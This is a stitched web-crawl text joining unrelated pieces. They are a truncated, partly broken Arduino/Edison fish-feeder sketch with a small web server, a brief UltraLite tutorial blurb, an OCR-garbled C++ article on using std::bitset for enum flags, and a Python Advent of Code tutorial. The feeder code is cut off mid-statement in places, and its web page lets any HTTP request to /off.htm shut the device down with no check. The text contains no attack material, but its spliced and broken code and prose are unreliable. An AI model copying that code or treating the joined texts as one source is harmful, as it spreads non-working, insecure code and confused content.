SoftwareServo myservo1; //servo that drops food SoftwareServo myservo2; //lid servo byte pos, posx, cent; int spin1 = 4; //feed servo int spin2 = 5; //lid servo int buzz = A4; #define TXT_BUF_SZ 50 #define REQ_BUF_SZ 90 char txt_buf[TXT_BUF_SZ] = {0}; // buffer to save text to char HTTP_req[REQ_BUF_SZ] = {0}; // buffered HTTP request stored as null terminated string char req_index = 0; // index into HTTP_req buffer char * str; char * str1; byte commaindex[15]; String txtval[15]; StringHOME</a> "); client.print("<a href=\"settime.htm\">SetTimes</a></font><br><br>"); client.print("<font size = 3>AquaFeeder is running OK. Here are the details. 
To change feeding times, click 'SetTimes' above.</font>"); client.print("<br><br><font size = 3><strong> Current time: </strong>"); client.print(String(printtime(hour()))); client.print(":"); client.print(String(printtime(minute()))); client.print("<br> <strong>Previously fed at: </strong>"); client.print(String(printtime(prevtime[0]))); client.print(":"); client.print(String(printtime(prevtime[1]))); client.print("<br> <strong>Next time to feed: </strong>"); client.print(String(printtime(nexttime[0]))); client.print(":"); client.print(String(printtime(nexttime[1]))); client.print("<br><br><strong>Feedtime 1: </strong>"); client.print(String(printtime(feedtime1[0]))); client.print(":"); client.print(String(printtime(feedtime1[1]))); client.print("<br><strong>Feedtime 2: </strong>"); client.print(String(printtime(feedtime2[0]))); client.print(":"); client.print(String(printtime(feedtime2[1]))); client.print("<br></font><br><font size = 5>Click <a href=\"/H\">here</a> to feed <i>now!</i></font><br>"); client.print("<br> <a href = \"off.htm\">Turn off Edison</a>"); } else if (StrContains(HTTP_req, "GET /settime.htm")) { Serial.println("set page"); str1 = readhtmFile(); Serial.println(str1); client.write(str1); delay(1000); } else if (StrContains(HTTP_req, "GET /off.htm")) { Serial.println("Switching off"); system("shutdown now"); } if (StrContains(HTTP_req, "ajax_inputs")) { Serial.println("ajax inputs"); if (GetText(txt_buf, TXT_BUF_SZ)) { Serial.println("\r\nReceived Text:"); webmsg = txt_buf; Serial.println(webmsg); commaindex[0] = webmsg.indexOf(','); txtval[0] = webmsg.substring(0, commaindex[0]); Serial.println(txtval[0].toInt()); for (int l = 1; l < 15; l++) { txtval[l] = 0; } for (int l = 1; l < 4; l++) { commaindex[l] = webmsg.indexOf(',', commaindex[(l - 1)] + 1); txtval[l] = webmsg.substring(commaindex[(l - 1)] + 1, commaindex[l]); Serial.println((txtval[l].toInt())); } feedtime1[0] = txtval[0].toInt(); feedtime1[1] = txtval[1].toInt(); feedtime1[2] = 0; feedtime2[0] = txtval[2].toInt(); feedtime2[1] = txtval[3].toInt(); feedtime2[2] = 0; Serial.println("updated feedtimes"); for (e = 0; e < 3; e++) { Serial.println(feedtime1[e]); Serial.println(feedtime2[e]); } delay(1000); getnexttime(); lcd.clear(); lcd.print("Updated times"); delay(300); } } req_index = 0; StrClear(HTTP_req, REQ_BUF_SZ); client.println(); Serial.println("DONE lient printinin"); delay(20); client.stop(); Serial.println("client disconnected"); break; } else { // if you got a newline, then clear currentLine: currentline = ""; } } else if (c != '\r') { // if you got anything else but a carriage return character, currentline += c; // add it to the end of the currentLine } if (currentline.endsWith("GET /H")) { Serial.println("got link message"); // GET /H turns the LED on tone(buzz, 100, 300); feednow = true; } } else { e += 1; Serial.println(e); if (e > 503) { //maybe not required client.stop(); Serial.println("client disconnected"); Serial.println(currentline); break; } } } delay(700); } }; } //; } void lcddisplay() { if (millis() - last > 4000) { i = !i; if (i == true) { lcd.clear(); lcd.print("Time: "); lcd.print(printtime(hour())); lcd.print(":"); lcd.print(printtime(minute())); lcd.setCursor(0, 1); if (WiFi.status() == WL_DISCONNECTED || WiFi.status() == WL_CONNECT_FAILED) { lcd.print("Not Connected"); } else { lcd.print(WiFi.localIP()); } delay(100); } else if (i == false) { lcd.clear(); lcd.print("Next: "); lcd.print(printtime(nexttime[0])); lcd.print(":"); lcd.print(printtime(nexttime[1])); lcd.setCursor(0, 
1); lcd.print("Prev: "); lcd.print(printtime(prevtime[0])); lcd.print(":"); lcd.print(printtime(prevtime[1])); delay(100); } last = millis(); } } String printtime(byte v) { static String vv = ""; if (v < 10) { vv = "0"; vv += v; return vv; } else { vv = ""; vv += v; return vv; } } //WiFI and Ntp stuff... void wifibegin() { e = 0; while ( status != WL_CONNECTED) { e++; Serial.println("Connecting"); lcd.clear(); lcd.print("Connecting to:"); delay(1000); lcd.clear(); lcd.print(String(ssid)); lcd.setCursor(0, 1); status = WiFi.begin(ssid, pass); delay(2000); if (e > 3) { lcd.clear(); lcd.print("Failed connecting"); break; } } for (int u = 0; u < 16; u++) { lcd.print("="); delay(20); } lcd.clear(); lcd.print("Connected!"); delay(200); Udp.begin(localPort); } time_t getNTPtime() { lcd.clear(); lcd.print("Getting time.."); sendNTPpacket(timeServer); delay(1000); if ( Udp.parsePack; const unsigned long seventyYears = 2208988800UL; unsigned long epoch = secsSince1900 - seventyYears; return epoch + 19800; //19800 in my case: multiply your timezone by 3600 } lcd.clear(); lcd.print("Success!"); delay(500); } unsigned long sendNTPpacket(IPAddress & address) { memset(packetBuffer, 0, NTP_PACKET_SIZE); // Initialize values needed to form NTP request printWifiStatus() { lcd.clear(); lcd.print("IP Address"); lcd.setCursor(0, 1); lcd.print(WiFi.localIP()); // print the SSID of the network you're attached to: Serial.print("SSID: "); Serial.println(WiFi.SSID()); // print your WiFi shield's IP address: IPAddress ip = WiFi.localIP(); Serial.print("IP Address: "); Serial.println(ip); long rssi = WiFi.RSSI(); Serial.print("signal strength (RSSI):"); Serial.print(rssi); Serial.println(" dBm"); delay(1000); } void checkiffed() { if (day() > prevdate) { if (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 2) { if (timecompare(prevtime[0], prevtime[1], prevtime[2], feedtime2[0], feedtime2[1], feedtime2[2]) == 2) { notfed = true; } else { notfed = false; } } else if ( (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 1) && (timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 2)) { notfed == true; } } else if (day() == prevdate) { if (fed2 == false && timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 1) { notfed = true; } else { notfed = false; } } } void getnexttime() { //less if ( (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 2) || (timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 1)) { nexttime[3] = feedtime1[3]; } else { nexttime[3] = feedtime2[3]; } Serial.println(nexttime[3]); } byte timecompare(int hour1, int minute1, int sec1, int hour2, int minute2, int sec2) { //0 = equal, 1= more, 2 = less if (hour1 == hour2) { if (minute1 == minute2) { return 0; } else if (minute1 > minute2) { return 1; } else if (minute1 < minute2) { return 2; } } else if (hour1 > hour2) { return 1; } else if (hour1 < hour2) { return 2; } } void feedthefish() { //Figure out next time to feed... Serial.println("Feeding..."); if (feednow1() == true) { nexttime[3] = feedtime2[3]; fed1 = true; } else if (feednow2() == true) { nexttime[3] = feedtime1[3]; fed2 = true; } openlid(); putfood(); closelid(); //set prevtime (previously fed time) as the time now... prevtime[0] = hour(); prevtime[1] = minute(); prevtime[2] = second(); //delete later if not required prevdate = day(); //set fed1 fed2 here again?? 
--waittt updatevartomem(); } void putfood() { lcd.clear(); lcd.print("Putting Food..."); digitalWrite(spin1, HIGH); //food servo for ( pos = 177; pos > 46; pos--) { Serial.println("feeding srvo"); Serial.println(pos); myservo1.write(pos); delay(10); } //shake a bit... myservo1.write(60); delay(300); myservo1.write(40); delay(300); myservo1.write(50); delay(300); myservo1.write(30); delay(300); for (pos = 40; pos < 180; pos++) { myservo1.write(pos); Serial.println(pos); delay(28); } digitalWrite(spin1, LOW); lcd.clear(); lcd.print("DONE!"); delay(1000); } void openlid() { lcd.clear(); lcd.print("Opening Lid..."); digitalWrite(spin2, HIGH); for (posx = 180; posx > 0; posx--) { myservo2.write(posx); // tell servo to go to position in variable 'pos' delay(32); } digitalWrite(spin2, LOW); lcd.clear(); lcd.print("Opened!"); delay(500); } void closelid() { lcd.clear(); lcd.print("Closing Lid."); digitalWrite(spin2, HIGH); for (posx = 1; posx < 180; posx++) { myservo2.write(posx); delay(30); } digitalWrite(spin2, LOW); lcd.clear(); lcd.print("Closed Lid!"); } boolean feednow1() { if ( (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 0) && fed1 == false) { return true; } else { return false; } } boolean feednow2() { if ( (timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 0) && fed2 == false) { return true; } else { return false; } } textreader.cArduino #include <stdio.h> #include <stdlib.h> #include <string.h> #include <malloc.h> char* readardFile (){ FILE *f = fopen("/home/root/arduino", "rb"); if (f != NULL) { fseek(f, 0, SEEK_END); long pos = ftell(f); fseek(f, 0, SEEK_SET); char *bytes = (char*)malloc(pos); fread(bytes, pos, 1, f); fclose(f); return bytes; } else { return NULL; } } char* readhtmFile (){ FILE *f1 = fopen("/home/root/text.htm", "rb"); if (f1 != NULL) { fseek(f1, 0, SEEK_END); long pos1 = ftell(f1); fseek(f1, 0, SEEK_SET); char *bytes1 = (char*)malloc(pos1); fread(bytes1, pos1, 1, f1); fclose(f1); return bytes1; } else { return NULL; } } Credits Replications Did you replicate this project? Share it!I made one Love this project? Think it could be improved? Tell us what you think!
https://www.hackster.io/DangerousTim/aquafeeder-2-0-automatic-fish-feeder-d15e0c?ref=part&ref_id=8232&offset=31
CC-MAIN-2017-34
en
refinedweb
This tutorial guides you through the process of building an UltraLite application for Windows Mobile using Microsoft Visual Studio. It uses the ADO.NET interface provided by the iAnywhere.Data.UltraLite namespace and runs on the .NET 3.5 Compact Framework. This tutorial contains code for a Visual Basic application and a Visual C# application. Lesson 1: Creating a Visual Studio project Lesson 2: Creating an UltraLite database Lesson 3: Connecting to the database Lesson 4: Inserting, updating, and deleting data Lesson 5: Building and deploying the application Code listing for C# tutorial Code listing for Visual Basic tutorial
http://dcx.sap.com/1201/en/uldotnet/dotnet-visual-tutorial.html
CC-MAIN-2017-34
en
refinedweb
Flag Waiving (Application Development Advisor 6(3), Apr enum to manage bit sets works fine in C, but things become a little more complex in C++. Kevlin Henney explains an alternative method of handling flags, using the bitset template Flag waiving Take a quick look at the following code: This brings us to the first bit of laziness to tidy up in the original enum definition. As it happens, the first three values form the sequence 0, 1and 2, which spec- ifies no bits, the first bit and the second bit respec- tively. Each integer power of 2, from 0 up, represents a different bit. To make it clear that the enumerators do not form a conventional sequence, but instead rep- resent bit masks, developers typically set the mask val- ues explicitly. As neither C nor C++ supports binary literals, it is more common to use hexadecimal rather than either decimal or octal to define the constants: typedef enum style { plain, bold, italic, underline = 4, strikethrough = 8, small_caps = 16 } style; What language is it in? It could be C or C++, although the style is clearly C-like; C++ does not need all that typedefnoise to obtain a usable type name. The following code fragments fix the language: enum style { plain, bold = 0x01, italic = 0x02, underline = 0x04, strikethrough = 0x08, small_caps = 0x10 }; style selected = plain; ... selected |= italic; ... if(selected & bold) ... Since the aim of this column is to reconsider how we work with flags in C++, I have also taken the small liberty of dropping the C-ish typedef. Let’s look at another common approach to specifying the enu- merators, that makes the basic idea of sequence (bit 0, bit 1, bit 2 etc) a little more explicit: It’s C. To be precise, it’s common but not particu- larly good C. The code demonstrates a weakness of the type system that encourages sloppy design. Unfortu- nately, given the enduring C influence on C++ cod- ing practices, this style for flags and sets of flags is also prevalent in C++. C++ programmers without a C background can acquire these habits by osmosis fromtheir C-speaking colleagues or through C-influ- enced libraries. enum style { plain, bold = 1 << 0, italic = 1 << 1, underline = 1 << 2, strikethrough = 1 << 3, Flag poll First, some quick explanation and a little bit of reformatting. As its name suggests, an enum is nor- mally used to enumerate a set of constants. By default, the enumerators have distinct values, starting at 0 and rising by 1 for each successive enumerator. Alterna- tively, an enumerator can be given a specific constant integer value. A common approach for holding a set of binary optionsis to treat an integer value as a collection of bits, ignoring its numeric properties. If a bit at a particular position is set, the option represented by that position is enabled. This duality is common at the systems pro- gramming level and many programmers never think to question it. C programmers and, indeed, C com- pilers make little distinction between enumerators, integers, flags and bit sets. An enum is often used to list the distinct options in a bit set, but instead of acting as distinct symbols, enumerator constants are used to represent bit masks. FACTS AT A GLANCE G C habits still affect C++ style,such as how to work with flags. G C++’s stronger type checking makes the C use of enums as bit sets somewhat awkward. G The standard library’s bitset template provides a simpler and more direct implementation for sets of flag options. G Programmers can define their own types for holding bit sets based on std::bitset. 
G Trait classes and policy parameters allow for flexible implementation. Kevlin Henney is an independent software development consultant and trainer.He can be reached at 56 APPLICATION DEVELOPMENT ADVISOR G small_caps = 1 << 4 a stylevariable to hold not an option but a set of options. While the bit representation of an enum affords such usage, it is by default a type error that is fundamentally a category error: a thing and a collection of things are different types. This answers the question of why plain is not really a valid enu- merator for style. It represents a combination of options (or, rather, their absence); it is a set rather than an individual option. The canon- ical C type for a bit set is the integer, signed or otherwise, but the C’s lax type system allows the free and easy mixing of unrelated concepts. Here is the revised code: }; This approach makes the bit-masking purpose of the enumera- tors a little clearer. The relationship to integers and ordinary count- ing numbers is less interesting than the shifted position of a set bit. But what about the code that shows how the styleflags are used? Alas, the following won’t compile: selected |= italic; This fails because enumand integer types are not interchangeable: arithmetic and bitwise operators do not apply to enums. When you use an enumwhere an integer is expected, you get an implicit con- version to the enum’s associated integer value, in effect: const unsigned plain = 0; ... unsigned selected = plain; ... selected |= italic; ... if(selected & bold) ... static_cast<int>(selected) |= static_cast<int>(italic); When integers go bad While there is not much wrong with using an enum as an inte- ger, there is plenty wrong with using an integer as an enum. Every enumerator will map to a valid integer value but not every valid integer will map to a valid enumerator. That’s why C++ banned the implicit conversion from integer to enum and why the code shown won’t compile. So how do you make it compile? You can force the compiler to succumb to your wicked way with a cast as your accomplice: However, what the other approaches lacked in grace, the inte- gerbit set loses in safety and precision. There is nothing that constrains the actual use of an unsigned to be the same as its intended use. Taking a step back from these many variations, you may realise the nagging truth: it’s all a bit of a hack. Why should you be man- ually organising your constants according to bit masks at all? It is easy to become rooted in only one form of thinking. Sometimes a fresh look will help you break out of a rut to a more appropriate solution. Let’s leave C behind. It’s time to get back to basics, ignoring all this bitwise gymnas- tics, and restate the core problem: you need to hold a set of options, each of which is effectively Boolean. This suggests a simple solution: hold a set of options. selected = static_cast<style>(selected | italic); It would be fair to say this lacks both grace and convenience. Alternatively, you could overload the bitwise or operators to do yourbidding: style operator|(style lhs, style rhs) { return static_cast<style>(int(lhs) | int(rhs)); } enum style { bold, italic, underline, strikethrough, small_caps }; ... std::set<style> selected; ... selected.insert(italic); ... if(selected.count(bold)) ... style &operator|=(style &lhs, style rhs) { return lhs = lhs | rhs; } This will allow the code to compile in its original form, but you should not forget to define the other relevant bitwise operators. 
One problem with this approach is that you need to define these operators anew for every enumtype you want to use as a bit set. And what do you do for the definition of the bitwise notoperator? This is used to ensure that a bit is disabled: This method is a lot simpler to work with: the style type sim- ply enumerates the options with no hard coding of literal values. The standard set class template allows a set of options to be manipulated as a type-checked set rather than at the systems programming level. In other words, the language and library do all the work for you. selected &= ~italic; What should the value of ~italicbe? bold | underline | strikethrough | small_caps or ~int(italic)? The former includes only bits that have been defined as valid for the bit set, but the latter is a simpler interpretation of the bit set concept. A quick aside on cast style: the constructor-like form, eg int(italic) is used where the conversion is safe and would otherwise be implicit. You are constructing an intfrom a style. The keyword cast form, static_cast, is being used where the conversion is potentially unsafe and we are taking liberties with the type system. Which brings us neatly to the next point: we are messing with the type system. There is an underlying reason why we are having to perform with a cast of thousands: the design is flawed. If you recall, the style type is an enumeration type. In other words, it enumerates the intended legal values of a style variable that is designed to hold one of the enumerator values at a time. However, the common practice uses Honing for efficiency Functionally, there are no problems with this approach, but many programmers may justifiably have concerns over its efficiency. The bitwise solution required an integer for storage, no additional dynamic memory usage, and efficient, fixed-time manipulation of the options. In contrast, an std::set is an associative node-based container that uses dynamic memory for its representation. If you hold these space and time efficiency concerns (and have good reason to), all is not lost: you can still have abstraction and efficiency. The flat_set class template presented in the last column1 is an improvement over std::set for this purpose. But better still is the standard bitset template: APRIL 2002 57 std::bitset<5> selected; ... selected.set(italic); ... if(selected.test(bold)) ... enum_set<style, _style_size> selected; This is clumsy and smacks of redundancy. We state the type and then a property of the type, relying in this case on a little hack to keep everything in sync. It would be nice to look up the relevant type properties based on the type name, so that the type is all the user has to specify in a declaration. C++’s reflective capabilities are quite narrow, limited to runtime-type information in the form of typeidand dynamic_castand compile-time type information in the form of sizeof. However, the traits technique2, first used in the C++ standard library, offers a simple form of customisable compile-time type information. It is a myth that classes exist only to act as the DNA for objects. Classes can be used to group non-instance information in the form of constants, types or staticmember functions, describing policiesor other types. A class template can be used to describe properties that relate to its parameters, specialising as necessary. 
This form of compile-time lookup allows us to answer neatly the question of the bitset’s size: The std::bitsetclass template, defined in the standard <bitset> header, is not a part of the STL, hence the seemingly non-standard member function names. But it is still standard and it still solves the problem. A more legitimate obstacle is that the size of the set must be wired in at compile time. There is also nothing that constrains you to working with the style type. There is a simple hack that allows you to avoid having to count the number of enumerators: enum style { bold, italic, underline, strikethrough, small_caps, _style_size }; ... std::bitset<_style_size> selected; ... template<typename enum_type> class enum_set { ... private: typedef enum_traits<enum_type> traits; std::bitset<traits::count> bits; }; I say this is a hack because you are using the property of enumerators to count, by default, in steps of 1 from 0. The last enumerator, _style_size, is not really part of the valid set of enumerators because it does not represent an option. However, in its favour, this technique does save you from many of the ravages of change: the addition or removal of enumerators and any consequent change to the declared size of the bitset. Producing a rabbit with style However, there is no such thing as magic. If you wish to pull a rabbit out of a hat, you had better have a rabbit somewhere to hand.Here is a definition of what the traits for the style type would look like: Rhyme and treason Now I think we have a better idea of what is needed: something that works like a type-safe bitsetfor enums. Alas, we won’t find one of thesein the standard so we will have to create it. Let’s start with the intended usage: template<> struct enum_traits<style> { typedef style enum_type; static const bool is_specialized = true; static const style first = bold; static const style last = small_caps; static const int step = 1; static const std::size_t count = last - first + 1; }; enum_set<style> selected; ... selected.set(italic); ... if(selected.test(bold)) ... It seems reasonable enough to follow the std::bitset interface because the two are conceptually related. Additionally, a const subscript operator would make its use even more intuitive: It is common to use structrather than classfor traits because they do not represent the type of encapsulated objects, and a private-public distinction serves no useful purpose. The trait class just shown is a full specialisation of the primary template, which is effectively just a shell with non-functional placeholder values: if(selected[bold]) ... template<typename type> struct enum_traits { typedef type enum_type; static const bool is_specialized = false; static const style first = type(); static const style last = type(); static const int step = 0; static const std::size_t count = 0; }; To save on all the bit twiddling, we can use std::bitset as the representation of our enum_set. However, a quick sketch reveals aproblem: template<typename enum_type> class enum_set { ... private: std::bitset<???> bits; }; The information available to an enum_traitsuser includes the type of the enum; whether or not the trait is valid (has been specialised); the first and last enumerator values; the step increment, if any, between How big should the bitsetbe? 
One unsatisfactory solution would be to require the user to provide the size as well as the type, ie: 58 APPLICATION DEVELOPMENT ADVISOR G std::size_t count() const { return bits.count(); } std::size_t size() const { return bits.size(); } bool operator[](enum_type testing) const { return bits.test(to_bit(testing)); } enum_set &set() { bits.set(); return *this; } enum_set &set(enum_type setting, bool value = true) { bits.set(to_bit(setting), value); return *this; } enum_set &reset() { bits.reset(); return *this; } enum_set &reset(enum_type resetting) { bits.reset(to_bit(resetting)); return *this; } enum_set &flip() { bits.flip(); return *this; } enum_set &flip(enum_type flipping) { bits.flip(to_bit(flipping)); return *this; } enum_set operator~() const { return enum_set(*this).flip(); } bool any() const { return bits.any(); } bool none() const { return bits.none(); } ... private: typedef enum_traits<enum_type> traits; static std::size_t to_bit(enum_type value) { return (value - traits::first) / traits::step; } std::bitset<traits::count> bits; }; each enumerator; and the count of the enumerators. This is all good information to have but it does seem like a lot of work: a separate specialisation is required for each enumtype. Fortunately, we can provide a helper class to cover most of this ground: template< typename type, type last_value, type first_value = type(), int step_value = 1> struct enum_traiter { typedef type enum_type; static const bool is_specialized = true; static const type first = first_value; static const type last = last_value; static const int step = step_value; static const std::size_t count = (last - first) / step + 1; }; The enum_traitertemplate is designed for use as a base, reducing the enum_traits specialisation for style: template<> struct enum_traits<style> : enum_traiter<style, small_caps> { }; This makes life a lot easier, and accommodates enumtypes whose enumerators do not number from 0 and whose step is not 1. However, the common case is catered for with default template parameters, remembering that the explicit default construction for integers and enums is zero initialisation. Wrapping and forwarding The implementation for enum_set becomes a fairly simple matter of wrapping and forwarding to a std::bitset: template<typename enum_type> class enum_set { public: enum_set() { } enum_set(enum_type setting) { set(setting); } enum_set &operator&=(const enum_set &rhs) { bits &= rhs.bits; return *this; } enum_set &operator|=(const enum_set &rhs) { bits |= rhs.bits; return *this; } enum_set &operator^=(const enum_set &rhs) { bits ^= rhs.bits; return *this; } APRIL 2002 59 ... often forgotten. Taking the opportunity to call into question certain C bit bashing tactics leads to the identification of new abstractions which, once implemented, reduce the density and quantity of code needed to express what are in essence high-level ideas. There is no need to jump through hoops when using the abstractions, although their implementation does call on some relatively advanced idioms. How far could you take the use of enum_traits? It is possible to extend it to accommodate existing enum types that are defined in terms of a bit-shifted progression rather than an arithmetic one. Based on traits, you can also define iteration for enum types. For the moment, these are left as exercises for the reader. I There is one final tweak that, for no extra hassle, makes the code a little more generic. A common use of trait classes in the standard library is as policy parameters. 
The default is to use the default trait for a type, but the user could provide an alternative. The use of policies is a long-standing C++ te chnique that has mature d ove r the last de cade3,4,5,6,7. The only difference to the enum_set template would be to remove the traits typedef and add a defaulted parameter: template< typename enum_type, typename traits = enum_traits<enum_type> > class enum_set { ... }; References 1. Kevlin Henney, “Bound and Checked”, Application De ve lopme nt Advis or, January 2002, available from 2. Nathan Myers, “Traits: A new and useful template technique”, C++ Re port, June 1995, available from 3. Andrei Alexandrescu, Mode rn C++ De s ign, Addison-Wesley, 2001 4. Grady Booch, Obje ct-Orie nte d Analys is and De s ign with Applications , 2nd edition, Benjamin/Cummings, 1994 5. Erich Gamma, Richard Helm, Ralph Johnson and John Vlissides, De s ign Patte rns , Addison-Wesley, 1995 6. Kevlin Henney, “Making an Exception”, Application De ve lopme nt Advis or, May 2001, available from 7. Bjarne Stroustrup, The De s ign and Evolution of C++, Addison-Wesley, 1994 This facility can be used to define sets on a subset of options: struct simple_style : enum_traiter<style, underline> { }; ... enum_set<style, simple_style> selected; ... This declaration of selected allows it to hold only bold, italic and underline options. Looking to the standard library can be a good way of finding either a solution or the inspiration for one. There are a lot of programming tasks that are repetitive and tedious. Because of their repetitive nature they become part of the background hum of programming, ADA's free e-mail newsletter for software developers By now many of you will have had a free on-line newsletter which is a service to readers of ADA and packed with the very latest editorial for software and application developers. However, some of our readers don't get this free service. If you don't get your free newsletter it's for one of two good reasons. Even though you subscribed to ADA, you haven't supplied us with your e-mail address. b You ticked the privacy box at the time you subscribed and we can't now send you our newsletter. c
http://www.slideserve.com/Kevlin/flag-waiving
CC-MAIN-2017-34
en
refinedweb
Advent of Code puzzles are designed to be approachable by anyone with an interest in problem-solving. You don't need a heavy computer science background to participate. Instead, Advent of Code is a great arena for learning new skills and testing out new features of Python. To get a feeling for how an Advent of Code puzzle works, consider the Day 1 puzzle of 2020: Before you leave, the Elves in accounting just need you to fix your expense report (your puzzle input); apparently, something isn't quite adding up. Specifically, they need you to find the two entries that sum to 2020 and then multiply those two numbers together. Each year, there's a wonderfully silly backstory that binds the puzzles together. The 2020 story describes your attempts at leaving for a well-deserved vacation, now that you've saved Christmas several years in a row. The story usually has no effect on the puzzles, but it's still fun to follow along. In between the plot elements of the story, you'll find the puzzles themselves. In this example, you're looking for two entries in your puzzle input that sum to 2,020. After the explanation that describes the problem, you'll usually find an example showing the calculations you're expected to do. Here, the example expense report contains the entries 1721, 979, 366, 299, 675, and 1456. The two entries that sum to 2,020 are 1721 and 299, and multiplying them together gives 514579. The example shows you the answer for this particular list of numbers. If you were about to jump in and start solving this puzzle, you would now start thinking about how you can find the two entries in any valid list of numbers. Before getting deeper into this puzzle, however, you'll explore how to use the Advent of Code site. How to Participate in Advent of Code You've seen an example of an Advent of Code puzzle. Next, you'll learn how you can submit your answer for it. You never submit any code to solve the puzzles. You just submit the answer, which is usually a number or a text string. In general, you'll follow a series of steps to solve a puzzle on the site: 1. Log in on the Advent of Code website. You do this by using your credentials from another service like GitHub, Google, Twitter, or Reddit. 2. Read the puzzle text and pay special attention to the given example. You should make sure you understand the solution for the example data. 3. Download your personalized input for the puzzle. You'll need this input in order to find your unique answer to the problem. 4. Code up your solution. This is the fun part, which you'll get a lot of practice for in the rest of this tutorial. 5. Enter your answer to the puzzle on the puzzle page. If your answer is correct, then you earn a golden star and part two of the puzzle is opened up. 6. Repeat steps 2 to 4 for part two of the puzzle. This second part is similar to the first, but it usually adds some twist requiring you to adapt your code. 7. Enter your second answer on the puzzle page in order to earn your second star and finish the puzzle. Remember, you don't submit any code—only your puzzle answers. This means that Advent of Code puzzles can be solved in any programming language. Many people use Advent of Code to practice and learn a new programming language. Eric Wastl, the creator of Advent of Code, gave a talk in 2019 where he talked about the diverse background and motivation of the people participating, among other things.
Instead, you should look at the private leaderboards. These become available after you’ve logged in, and they give you a chance to invite your friends and colleagues to a more relaxed community. You can choose to score your private leaderboard either based on when puzzles were solved or simply based on the number of puzzles people have solved. You can also link your name in the private leaderboards to your GitHub account, which allows you to share your solutions with your friends. You set this up by clicking Settings in the menu on the Advent of Code site after you’ve logged in. Advent of Code is completely free to use, but there are still a few different ways you can support the project: - You can share information about Advent of Code on your social media to get the word out. - You can help others by taking part in the r/adventofcode subreddit or other forums. - You can invite your friends to take part in Advent of Code, sharing your results on a private leaderboard. - You can donate to Advent of Code. If you do, then you’ll get an AoC++ badge next to your name on the site. In the next sections, you’ll see some suggestions on how you can prepare for solving Advent of Code with Python. There’s also an awesome list you can check out that links to many different resources related to Advent of Code, including many other people’s solutions. Solving Advent of Code With Python The Advent of Code has become an annual highlight for many coders around the world. In 2020, more than 170,000 people submitted their solutions. Since Advent of Code was started in 2015, more than 380,000 programmers have participated. Many of them use Python to solve the puzzles. Well, now it’s your turn! Head over to the Advent of Code website and have a look at the latest puzzles. Then, come back to this tutorial to get some tips and help to start solving Advent of Code puzzles with Python. The Anatomy of a Puzzle In this section, you’ll explore the typical anatomy of an Advent of Code puzzle. Additionally, you’ll learn about some tools you can use to interact with it. Each Advent of Code puzzle is split into two parts. When you start working on a puzzle, you only see the first part. The second part unlocks once you’ve submitted the correct answer to the first part. This is often a twist on the problem you solved in the first part. Sometimes, you’ll find it necessary to refactor your solution from part one, while other times you can solve the second part quickly based on the work you’ve already done. Both parts always use the same puzzle input. You can download your puzzle input from the puzzle page for that day. You’ll find a link after the puzzle description. Note: As mentioned earlier, your puzzle input is personalized. This means that if you discuss solutions with other people, their final answers will likely be different from yours. Everything you need to do in order to submit your puzzle solutions—except actually solving the puzzle—you can do from the Advent of Code website. You should use it to submit your first solutions so that you can get familiar with the flow. Later, there are several tools you can use to organize your Advent of Code setup and work more efficiently. For example, you can use the advent-of-code-data package to download data. It’s a Python package that you can install with pip: $ python -m pip install advent-of-code-data You can use advent-of-code-data to download a particular puzzle input set on the command line with its aocd tool. 
Another fun possibility is automatically downloading and caching your personalized puzzle input within your Python code: >>> from aocd.models import Puzzle >>> puzzle = Puzzle(year=2020, day=1) >>> # Personal input data. Your data will be different. >>> puzzle.input_data[:20] '1753\n1858\n1860\n1978\n' You need to set your session ID in either an environment variable or a file before you can download your personalized data with advent-of-code-data. You’ll find an explanation for this in the documentation. If you’re interested, then you can also use advent-of-code-data or aocd to submit your solutions and review your earlier answers. As part of the puzzle text, you’ll also find one or several examples typically calculated based on smaller data than your personalized input data. You should read these examples carefully and make sure you understand what you’re asked to do before you start coding. You can use the examples to set up tests for your code. One way is to manually run your solution on the example data and confirm that you’re getting the expected answer. Alternatively, you can use a tool like pytest to automate the process. Note: Test-driven development (TDD) is a process where you write tests before implementing your code. Because Advent of Code provides you with expected answers to small examples, it gives you a great opportunity to try out test-driven development on your own. You’ll learn more about TDD later when you try to solve some puzzles by yourself. You can solve all Advent of Code puzzles using just plain Python and the standard library. However, there are a few packages that can aid you as you’re putting together your solutions: advent-of-code-datacan download your input data and submit your solutions. pytestcan check your solution on the example data automatically. parsecan parse strings with a simpler syntax than regular expressions. numpycan effectively compute with arrays of numbers. coloramacan animate your solutions in the terminal. If you create a virtual environment and install those packages, then you’ll have a very solid toolbox for your Advent of Code adventures. Later, you’ll see examples of how you can use parse, numpy, and colorama to solve puzzles. The Structure of a Solution In the last section, you got familiar with how to read and understand Advent of Code puzzles. In this section, you’ll learn how you can solve them. You don’t need to do a lot of setup before you solve the Advent of Code puzzles. Have you thought about how you’d solve the puzzle that you saw earlier? Recall that you’re looking for the product of the two numbers in a list that sum to 2,020. Before moving on, think about—and maybe code up—how you’d find which two entries of the following list sum to 2,020: numbers = [1721, 979, 366, 299, 675, 1456] The following script shows one way to solve this first part of the Day 1, 2020 puzzle: 1for num1 in numbers: 2 for num2 in numbers: 3 if num1 < num2 and num1 + num2 == 2020: 4 print(num1 * num2) The nested for loop finds all combinations of two numbers from the list. The test on line 3 is actually slightly more complicated than it needs to be: you only need to test that the numbers sum to 2,020. However, by adding the condition that num1 should be smaller than num2, you avoid solutions being found twice. In this example, one solution looks like num1 = 1721 and num2 = 299, but since you can add numbers in any order, that means that also num1 = 299 and num2 = 1721 form a solution. With the extra check, only the latter combination is reported. 
